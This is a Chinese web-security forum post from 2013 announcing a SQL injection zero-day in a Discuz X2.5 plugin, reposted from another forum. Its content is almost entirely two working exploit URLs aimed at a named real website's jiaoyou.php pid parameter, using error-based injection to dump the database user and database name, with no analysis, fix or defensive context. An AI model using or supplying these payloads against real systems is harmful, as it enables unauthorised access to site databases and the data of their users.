最新DZ X2.5 0DAY (By saviour) 附EXP

2013-04-17 20:13:40 42 5465

DZ 插件注入漏洞!
前几天看COG发布 但阅读权限得200 (管理员才可以查看)

刚去看了下已经公开了 所以我就转过来了
Exp:
http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1


http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1
类别 Web安全

关于作者

爱绱hack32篇文章618篇回复

爱绱hack
42

评论42次

要评论?请先  登录  或  注册